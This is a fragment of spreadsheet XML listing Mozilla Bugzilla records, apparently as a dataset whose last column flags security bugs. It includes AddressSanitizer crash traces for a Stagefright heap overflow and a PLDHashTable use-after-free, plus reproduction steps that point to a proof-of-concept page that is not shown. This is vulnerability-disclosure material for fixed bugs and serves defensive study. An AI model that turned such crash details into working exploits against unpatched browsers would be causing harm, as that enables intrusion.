        </is>
      </c>
      <c r="E2287" t="n">
        <v>1</v>
      </c>
      <c r="F2287" t="n">
        <v>1</v>
      </c>
      <c r="G2287" t="n">
        <v>7</v>
      </c>
      <c r="H2287" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2287" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2287" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2287" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2287" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2287" t="inlineStr"/>
      <c r="Q2287" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2287" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2287" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2287" t="n">
        <v>1</v>
      </c>
      <c r="U2287" t="n">
        <v>0</v>
      </c>
      <c r="V2287" t="n">
        <v>7</v>
      </c>
      <c r="W2287" t="inlineStr">
        <is>
          <t>When building Python 2.7 from source, by default it uses UCS-2 unicode mode. (It wasn't until Python 3.3 when PEP 393 landed, that UCS-4 was made the default.)
The Python 2.7.x that Heroku provides to us is built from source using the default unicode mode, so is UCS-2. However the system Ubuntu Python uses UCS-4 mode (aka wide mode).
For parity with other environments, we should switch to UCS-4 on Heroku. This will avoid us hitting annoying unicode bugs as happened in bug 1277300.
Ideally they'll upload a UCS-4 binary for us (I'll open a PR for the build script to create it), but failing that we can install one ourselves.</t>
        </is>
      </c>
      <c r="X2287" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" t="n">
        <v>317275</v>
      </c>
      <c r="B2288" t="inlineStr">
        <is>
          <t>2005-11-21 04:33:56 -0800</t>
        </is>
      </c>
      <c r="C2288" t="inlineStr">
        <is>
          <t>Evil float:right testcase causes assertions and can crash [@ nsFrame::GetFirstLeaf]</t>
        </is>
      </c>
      <c r="D2288" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E2288" t="n">
        <v>1</v>
      </c>
      <c r="F2288" t="n">
        <v>1</v>
      </c>
      <c r="G2288" t="n">
        <v>3</v>
      </c>
      <c r="H2288" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2288" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2288" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2288" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2288" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2288" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2288" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2288" t="inlineStr">
        <is>
          <t>[rft-dl]</t>
        </is>
      </c>
      <c r="Q2288" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2288" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2288" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2288" t="n">
        <v>1</v>
      </c>
      <c r="U2288" t="n">
        <v>0</v>
      </c>
      <c r="V2288" t="n">
        <v>29</v>
      </c>
      <c r="W2288" t="inlineStr">
        <is>
          <t>See upcoming testcase.
It doesn't crash easily, when following the directions in the testcase.
But the assertions I get in a debug build with the testcase, I get 100% of the time.
It doesn't crash Mozilla1.7, I'm quite certain of that. Also, in Mozilla1.7, the green block doesn't seem 'out of place' (which you can see with the dom inspector).</t>
        </is>
      </c>
      <c r="X2288" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" t="n">
        <v>431086</v>
      </c>
      <c r="B2289" t="inlineStr">
        <is>
          <t>2008-04-27 13:56:21 -0700</t>
        </is>
      </c>
      <c r="C2289" t="inlineStr">
        <is>
          <t>Crash [@ nsHTMLEditor::HideResizers] with non-HTML root, changing contentEditable property a lot</t>
        </is>
      </c>
      <c r="D2289" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2289" t="n">
        <v>1</v>
      </c>
      <c r="F2289" t="n">
        <v>1</v>
      </c>
      <c r="G2289" t="n">
        <v>3</v>
      </c>
      <c r="H2289" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2289" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2289" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2289" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2289" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2289" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q2289" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2289" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2289" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2289" t="n">
        <v>1</v>
      </c>
      <c r="U2289" t="n">
        <v>0</v>
      </c>
      <c r="V2289" t="n">
        <v>28</v>
      </c>
      <c r="W2289" t="inlineStr">
        <is>
          <t>Created attachment 318054
testcase
Loading the testcase makes Firefox crash [@ nsHTMLEditor::HideResizers].  The immediate cause of the crash is that mTopLeftHandle is null.</t>
        </is>
      </c>
      <c r="X2289" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" t="n">
        <v>502975</v>
      </c>
      <c r="B2290" t="inlineStr">
        <is>
          <t>2009-07-07 17:46:12 -0700</t>
        </is>
      </c>
      <c r="C2290" t="inlineStr">
        <is>
          <t>"Field only appears when foo is set to" feature broken</t>
        </is>
      </c>
      <c r="D2290" t="inlineStr">
        <is>
          <t>2009-07-08 02:25:35 -0700</t>
        </is>
      </c>
      <c r="E2290" t="n">
        <v>1</v>
      </c>
      <c r="F2290" t="n">
        <v>1</v>
      </c>
      <c r="G2290" t="n">
        <v>4</v>
      </c>
      <c r="H2290" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2290" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2290" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K2290" t="inlineStr">
        <is>
          <t>3.3.4</t>
        </is>
      </c>
      <c r="L2290" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2290" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2290" t="inlineStr"/>
      <c r="Q2290" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2290" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2290" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T2290" t="n">
        <v>1</v>
      </c>
      <c r="U2290" t="n">
        <v>0</v>
      </c>
      <c r="V2290" t="n">
        <v>4</v>
      </c>
      <c r="W2290" t="inlineStr">
        <is>
          <t>Select a field "foo" in the ""Field only appears when" list. The list "is set to" of legal values is empty and the following JS error is thrown:
Erreur : aArray is undefined
Fichier Source : https://localhost/bugzilla/js/util.js
Ligne : 198
Line 198 is:
function bz_populateSelectFromArray(aSelect, aArray) {
  // Clear the field
  bz_clearOptions(aSelect);
  for (var i = 0; i &lt; aArray.length; i++) { &lt;------- 198 !!!
    var item = aArray[i];
    bz_createOptionInSelect(aSelect, item[1], item[0]);
  }
}
I'm pretty sure this feature was working correctly in the past, so adding the "regression" keyword.</t>
        </is>
      </c>
      <c r="X2290" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" t="n">
        <v>1186718</v>
      </c>
      <c r="B2291" t="inlineStr">
        <is>
          <t>2015-07-22 17:30:16 -0700</t>
        </is>
      </c>
      <c r="C2291" t="inlineStr">
        <is>
          <t>Stagefright: heap-buffer-overflow crash [@stagefright::ESDS::parseESDescriptor]</t>
        </is>
      </c>
      <c r="D2291" t="inlineStr">
        <is>
          <t>2015-09-17 08:56:31 -0700</t>
        </is>
      </c>
      <c r="E2291" t="n">
        <v>1</v>
      </c>
      <c r="F2291" t="n">
        <v>1</v>
      </c>
      <c r="G2291" t="n">
        <v>3</v>
      </c>
      <c r="H2291" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2291" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2291" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2291" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2291" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2291" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2291" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2291" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2291" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2291" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2291" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2291" t="n">
        <v>1</v>
      </c>
      <c r="U2291" t="n">
        <v>0</v>
      </c>
      <c r="V2291" t="n">
        <v>18</v>
      </c>
      <c r="W2291" t="inlineStr">
        <is>
          <t>Looks similar to Bug 1184871 but it's a heap-buffer-overflow not UAF.
==8659==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6080003bfe2d at pc 0x7f6d64764423 bp 0x7f6cde479850 sp 0x7f6cde479848
READ of size 1 at 0x6080003bfe2d thread T819 (MediaPl~back #1)
    #0 0x7f6d64764422 in parseESDescriptor /builds/slave/m-cen-l64-asan-000000000000000/build/src/media/libstagefright/frameworks/av/media/libstagefright/ESDS.cpp:157
    #1 0x7f6d64744dd5 in parse /builds/slave/m-cen-l64-asan-000000000000000/build/src/media/libstagefright/frameworks/av/media/libstagefright/ESDS.cpp:121
    #2 0x7f6d6474fb60 in GetTrackInfo /builds/slave/m-cen-l64-asan-000000000000000/build/src/media/libstagefright/binding/MP4Metadata.cpp:198
    #3 0x7f6d69322a70 in MP4TrackDemuxer /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/fmp4/MP4Demuxer.cpp:206
    #4 0x7f6d693217a1 in GetTrackDemuxer /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/fmp4/MP4Demuxer.cpp:145
    #5 0x7f6d68ef7a26 in OnDemuxerInitDone /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/MediaFormatReader.cpp:309
    #6 0x7f6d68f6d1f6 in RejectValue /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/MozPromise.h:433
    #7 0x7f6d68f6add2 in DoResolveOrReject /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/MozPromise.h:383
    #8 0x7f6d68f6a77f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/MozPromise.h:316
    #9 0x7f6d68e6dd0a in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/TaskDispatcher.h:180
    #10 0x7f6d69005995 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/TaskQueue.cpp:257
    #11 0x7f6d649253d1 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThreadPool.cpp:228
    #12 0x7f6d6492578c in _ZThn8_N12nsThreadPool3RunEv /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/xpcom/threads/Unified_cpp_xpcom_threads0.cpp:242
    #13 0x7f6d6491f2d7 in ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:867
    #14 0x7f6d6498df1a in NS_ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:277
    #15 0x7f6d651f755f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:326
    #16 0x7f6d6518345c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #17 0x7f6d6491b6f5 in ThreadFunc /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:360
    #18 0x7f6d73148135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #19 0x7f6d7666fe99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
    #20 0x7f6d7576c31c in ?? /build/buildd/eglibc-2.15/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:112
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c108006ff70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c108006ff80: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c108006ff90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c108006ffa0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c108006ffb0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 04 fa
=&gt;0x0c108006ffc0: fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c108006ffd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c108006ffe0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c108006fff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1080070000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c108007001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Thread T819 (MediaPl~back #1) created by T0 here:
    #0 0x45eae5 in __interceptor_pthread_create _asan_rtl_
    #1 0x7f6d73144abd in _PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7f6d7314463a in PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7f6d6491cced in Init /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:470
    #4 0x7f6d64922cee in NewThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThreadManager.cpp:249
    #5 0x7f6d649243be in PutEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThreadPool.cpp:109
    #6 0x7f6d64925c97 in Dispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThreadPool.cpp:276
    #7 0x7f6d690040f9 in operator nsIEventTarget * /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/nsIEventTarget.h:37
    #8 0x7f6d68fc8bec in Dispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/platforms/../../../dist/include/mozilla/TaskQueue.h:47
    #9 0x7f6d68e6d67c in DispatchTaskGroup /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/TaskDispatcher.h:232
    #10 0x7f6d68e6c322 in ~AutoTaskDispatcher /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/TaskDispatcher.h:87
    #11 0x7f6d68e6b471 in reset /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/Maybe.h:373
    #12 0x7f6d68e6b610 in apply&lt;mozilla::XPCOMThreadWrapper, void (mozilla::XPCOMThreadWrapper::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/nsThreadUtils.h:621
    #13 0x7f6d69ec5125 in assign_assuming_AddRef /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/widget/../dist/include/nsCOMPtr.h:336
    #14 0x7f6d69ec5ccd in AfterProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.h:95
    #15 0x7f6d6491f7a0 in ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:881
    #16 0x7f6d6498df1a in NS_ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:277
    #17 0x7f6d651f65e9 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:95
    #18 0x7f6d6518345c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #19 0x7f6d69ec38d7 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:165
    #20 0x7f6d6bc200f8 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:280
    #21 0x7f6d6bd28e17 in XRE_mainRun /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4288
    #22 0x7f6d6bd29e75 in XRE_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4385
    #23 0x7f6d6bd2acf5 in XRE_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4474
    #24 0x48a6e4 in do_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/nsBrowserApp.cpp:212
    #25 0x7f6d7569976c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
==8659==ABORTING</t>
        </is>
      </c>
      <c r="X2291" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" t="n">
        <v>388717</v>
      </c>
      <c r="B2292" t="inlineStr">
        <is>
          <t>2007-07-18 19:06:54 -0700</t>
        </is>
      </c>
      <c r="C2292" t="inlineStr">
        <is>
          <t>Version/config bumps for Tb 150thirteen</t>
        </is>
      </c>
      <c r="D2292" t="inlineStr">
        <is>
          <t>2007-08-27 13:26:10 -0700</t>
        </is>
      </c>
      <c r="E2292" t="n">
        <v>1</v>
      </c>
      <c r="F2292" t="n">
        <v>1</v>
      </c>
      <c r="G2292" t="n">
        <v>2</v>
      </c>
      <c r="H2292" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2292" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J2292" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K2292" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L2292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2292" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2292" t="inlineStr"/>
      <c r="Q2292" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2292" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2292" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2292" t="n">
        <v>1</v>
      </c>
      <c r="U2292" t="n">
        <v>0</v>
      </c>
      <c r="V2292" t="n">
        <v>12</v>
      </c>
      <c r="W2292" t="inlineStr">
        <is>
          <t>Tracking bug for version and config bumps for the Thunderbird 1.5.0.13 release.</t>
        </is>
      </c>
      <c r="X2292" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" t="n">
        <v>1729642</v>
      </c>
      <c r="B2293" t="inlineStr">
        <is>
          <t>2021-09-08 01:56:09 -0700</t>
        </is>
      </c>
      <c r="C2293" t="inlineStr">
        <is>
          <t>SUMMARY: AddressSanitizer: heap-use-after-free PLDHashTable.cpp:619 in PLDHashTable::MakeEntryHandle</t>
        </is>
      </c>
      <c r="D2293" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:24 -0700</t>
        </is>
      </c>
      <c r="E2293" t="n">
        <v>1</v>
      </c>
      <c r="F2293" t="n">
        <v>1</v>
      </c>
      <c r="G2293" t="n">
        <v>3</v>
      </c>
      <c r="H2293" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2293" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2293" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2293" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2293" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2293" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2293" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2293" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main93+][adv-esr91.2+]</t>
        </is>
      </c>
      <c r="Q2293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2293" t="inlineStr">
        <is>
          <t>94 Branch</t>
        </is>
      </c>
      <c r="T2293" t="n">
        <v>1</v>
      </c>
      <c r="U2293" t="n">
        <v>0</v>
      </c>
      <c r="V2293" t="n">
        <v>24</v>
      </c>
      <c r="W2293" t="inlineStr">
        <is>
          <t>Created attachment 9240010
0908.zip
#Summary
SUMMARY: AddressSanitizer: heap-use-after-free PLDHashTable.cpp:619 in PLDHashTable::MakeEntryHandle
#Reproduce
OS:Win10 X64
Firefox: Nightly 94.0a1 (2021-09-07) (64-bit)
step:
1. python -m http.server 80
2. install node&amp;puppeteer-core (ffpuppet not work on windows)
3. node ff.test.js D:\firefox_asan\target\firefox\firefox.exe http://localhost/poc.htm
4. wait for 30s if not crashes try again
#Type of crash
Tab process
#Analysis
Not yet
#Patch
Not Yet
#ASAN
=================================================================
==3780==ERROR: AddressSanitizer: heap-use-after-free on address 0x1275b70c0d70 at pc 0x7ffe09934350 bp 0x00d37d5f9880 sp 0x00d37d5f98c8
READ of size 4 at 0x1275b70c0d70 thread T0
    #0 0x7ffe0993434f in PLDHashTable::MakeEntryHandle /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:619
    #1 0x7ffe09934c5b in PLDHashTable::MakeEntryHandle /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:673
    #2 0x7ffe09cf2113 in nsLanguageAtomService::GetLanguageGroup /builds/worker/checkouts/gecko/intl/locale/nsLanguageAtomService.cpp:146
    #3 0x7ffe1344b863 in mozilla::StaticPresData::GetFontPrefsForLang /builds/worker/checkouts/gecko/layout/base/StaticPresData.cpp:219
    #4 0x7ffe132c18af in nsStyleFont::nsStyleFont /builds/worker/checkouts/gecko/layout/style/nsStyleStruct.cpp:240
    #5 0x7ffe187c3330 in style::gecko_properties::ComputedValues::default_values /builds/worker/workspace/obj-build/x86_64-pc-windows-msvc/release/build/style-4ff881e47c64df5b/out/gecko_properties.rs:315
    #6 0x7ffe181cf3fa in geckoservo::glue::Servo_StyleSet_Init /builds/worker/checkouts/gecko/servo/ports/geckolib/glue.rs:4095
    #7 0x7ffe1325536a in mozilla::ServoStyleSet::ServoStyleSet /builds/worker/checkouts/gecko/layout/style/ServoStyleSet.cpp:117
    #8 0x7ffe0cfde456 in mozilla::dom::Document::Init /builds/worker/checkouts/gecko/dom/base/Document.cpp:2639
    #9 0x7ffe123d40d9 in NS_NewDOMDocument /builds/worker/checkouts/gecko/dom/xml/XMLDocument.cpp:75
    #10 0x7ffe0cec6f50 in mozilla::dom::DOMImplementation::CreateDocument /builds/worker/checkouts/gecko/dom/base/DOMImplementation.cpp:100
    #11 0x7ffe0cec77ed in mozilla::dom::DOMImplementation::CreateDocument /builds/worker/checkouts/gecko/dom/base/DOMImplementation.cpp:128
    #12 0x7ffe0efefef1 in mozilla::dom::DOMImplementation_Binding::createDocument /builds/worker/workspace/obj-build/dom/bindings/DOMImplementationBinding.cpp:166
    #13 0x7ffe0f858269 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3300
    #14 0x24bd57e396e  (&lt;unknown module&gt;)
0x1275b70c0d70 is located 32 bytes inside of 48-byte region [0x1275b70c0d50,0x1275b70c0d80)
freed by thread T0 here:
    #0 0x7ffe33555afb in free Z:\task_163036031364766\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7ffe09834114 in mozilla::KillClearOnShutdown /builds/worker/checkouts/gecko/xpcom/base/ClearOnShutdown.cpp:55
    #2 0x7ffe09b9473d in mozilla::ShutdownXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:650
    #3 0x7ffe16f70200 in XRE_TermEmbedding /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:218
    #4 0x7ffe0aef9368 in mozilla::ipc::ScopedXREEmbed::Stop /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:90
    #5 0x7ffe16f71064 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:753
    #6 0x7ff7897e1f49 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #7 0x7ff7897e14d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #8 0x7ff7898de217 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #9 0x7ffe61627033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #10 0x7ffe63602650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
previously allocated by thread T0 here:
    #0 0x7ffe33555c0b in malloc Z:\task_163036031364766\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:98
    #1 0x7ffe33ec139d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe09cf1bf7 in nsLanguageAtomService::GetService /builds/worker/checkouts/gecko/intl/locale/nsLanguageAtomService.cpp:87
    #3 0x7ffe1344a428 in mozilla::StaticPresData::Init /builds/worker/checkouts/gecko/layout/base/StaticPresData.cpp:20
    #4 0x7ffe13f33dd5 in nsLayoutStatics::Initialize /builds/worker/checkouts/gecko/layout/build/nsLayoutStatics.cpp:178
    #5 0x7ffe13f33cbd in nsLayoutModuleInitialize /builds/worker/checkouts/gecko/layout/build/nsLayoutModule.cpp:104
    #6 0x7ffe09a8abf9 in nsComponentManagerImpl::Init /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:408
    #7 0x7ffe09b936e1 in NS_InitXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:446
    #8 0x7ffe16f7013e in XRE_InitEmbedding2 /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:192
    #9 0x7ffe0aef98ac in mozilla::ipc::ScopedXREEmbed::Start /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:83
    #10 0x7ffe120ffe0f in mozilla::dom::ContentProcess::Init /builds/worker/checkouts/gecko/dom/ipc/ContentProcess.cpp:202
    #11 0x7ffe16f70f01 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #12 0x7ff7897e1f49 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
